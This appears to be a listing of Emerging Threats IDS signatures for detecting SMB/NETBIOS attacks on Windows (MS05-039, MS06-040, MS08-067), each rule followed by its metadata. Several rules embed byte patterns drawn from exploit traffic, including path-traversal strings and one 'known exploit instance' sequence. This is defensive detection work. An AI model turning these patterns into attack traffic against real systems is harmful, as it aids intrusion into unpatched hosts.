#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB-DS DCERPC PnP bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:2; content:"|0B|"; within:1; distance:1; content:"|40 4E 9F 8D 3D A0 CE 11 8F 69 08 00 3E 30 05 1B|"; flowbits:set,netbios.pnp.bind.attempt; flowbits:noalert; reference:url,doc.emergingthreats.net/bin/view/Main/2002200; classtype:protocol-command-decode; sid:2002200; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB-DS DCERPC PnP bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : url,doc.emergingthreats.net/bin/view/Main/2002200

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002201

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB-DS DCERPC PnP QueryResConfList exploit attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|36 00|"; within:2; distance:26; pcre:"/(x00\x00.*?){2}x00{2}xFF{2}.{128,}[x04-xFF][x00-xFF]{3}x00{4}$/Rs"; flowbits:isset,netbios.pnp.bind.attempt; reference:cve,CAN-2005-1983; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; reference:url,doc.emergingthreats.net/bin/view/Main/2002201; classtype:attempted-admin; sid:2002201; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB-DS DCERPC PnP QueryResConfList exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,CAN-2005-1983|url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx|url,doc.emergingthreats.net/bin/view/Main/2002201

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002202

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"ET NETBIOS SMB DCERPC PnP bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"|40 4E 9F 8D 3D A0 CE 11 8F 69 08 00 3E 30 05 1B|"; flowbits:set,netbios.pnp.bind.attempt; flowbits:noalert; reference:url,doc.emergingthreats.net/bin/view/Main/2002202; classtype:protocol-command-decode; sid:2002202; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB DCERPC PnP bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : url,doc.emergingthreats.net/bin/view/Main/2002202

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002203

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"ET NETBIOS SMB DCERPC PnP QueryResConfList exploit attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 00|"; within:10; distance:4; nocase; content:"|36 00|"; within:2; distance:19; pcre:"/(x00\x00.*?){2}x00{2}xFF{2}.{128,}[x04-xFF][x00-xFF]{3}x00{4}$/Rs"; flowbits:isset,netbios.pnp.bind.attempt; reference:cve,CAN-2005-1983; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; reference:url,doc.emergingthreats.net/bin/view/Main/2002203; classtype:attempted-admin; sid:2002203; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB DCERPC PnP QueryResConfList exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,CAN-2005-1983|url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx|url,doc.emergingthreats.net/bin/view/Main/2002203

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2003081

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"ET NETBIOS NETBIOS SMB DCERPC NetrpPathCanonicalize request (possible MS06-040)"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB|25|"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00|"; within:9; distance:4; content:"|1f 00|"; distance:20; within:2; reference:url,www.microsoft.com/technet/security/bulletin/MS06-040.mspx; reference:url,doc.emergingthreats.net/bin/view/Main/2003081; classtype:misc-attack; sid:2003081; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : NETBIOS SMB DCERPC NetrpPathCanonicalize request (possible MS06-040)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : url,www.microsoft.com/technet/security/bulletin/MS06-040.mspx|url,doc.emergingthreats.net/bin/view/Main/2003081

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2003082

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS NETBIOS SMB-DS DCERPC NetrpPathCanonicalize request (possible MS06-040)"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB|25|"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00|"; within:9; distance:4; content:"|1f 00|"; distance:20; within:2; reference:url,www.microsoft.com/technet/security/bulletin/MS06-040.mspx; reference:url,doc.emergingthreats.net/bin/view/Main/2003082; classtype:misc-attack; sid:2003082; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : NETBIOS SMB-DS DCERPC NetrpPathCanonicalize request (possible MS06-040)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : url,www.microsoft.com/technet/security/bulletin/MS06-040.mspx|url,doc.emergingthreats.net/bin/view/Main/2003082

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008690

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1)"; content:"|0B|"; offset:2; depth:1; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008690; classtype:attempted-admin; sid:2008690; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (1)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008690

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008691

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"..|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008691; classtype:attempted-admin; sid:2008691; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (2)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008691

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008692

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"../../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008692; classtype:attempted-admin; sid:2008692; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (3)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008692

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008693

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008693; classtype:attempted-admin; sid:2008693; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (4)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008693

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008694

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008694; classtype:attempted-admin; sid:2008694; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (5)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008694

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008696

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"..|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008696; classtype:attempted-admin; sid:2008696; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (7)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008696

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008697

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"../../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008697; classtype:attempted-admin; sid:2008697; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (8)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008697

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008698

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008698; classtype:attempted-admin; sid:2008698; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (9)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008698

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008699

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008699; classtype:attempted-admin; sid:2008699; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (10)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008699

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008700

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance"; content:"|00 2e 00 2e 00 2f 00 2e 00 2e 00 2f 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 87|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008700; classtype:attempted-admin; sid:2008700; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 — Known Exploit Instance

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008700

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008701

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)"; flow:established,to_server; content:"|0B|"; offset:2; depth:1; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008701; classtype:attempted-admin; sid:2008701; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (11)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008701

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008702

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008702; classtype:attempted-admin; sid:2008702; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (12)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008702

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008703

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"/../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008703; classtype:attempted-admin; sid:2008703; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (13)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008703

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008704

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008704; classtype:attempted-admin; sid:2008704; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (14)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008704

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008705

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008705; classtype:attempted-admin; sid:2008705; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (15)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008705

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008706

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16)"; flow:established,to_server; content:"|0B|"; offset:2; depth:1; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008706; classtype:attempted-admin; sid:2008706; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (16)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008706

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008707

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"..|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008707; classtype:attempted-admin; sid:2008707; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (17)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008707

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008708

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"../../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008708; classtype:attempted-admin; sid:2008708; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (18)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008708

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008709

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008709; classtype:attempted-admin; sid:2008709; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (19)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008709

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008710

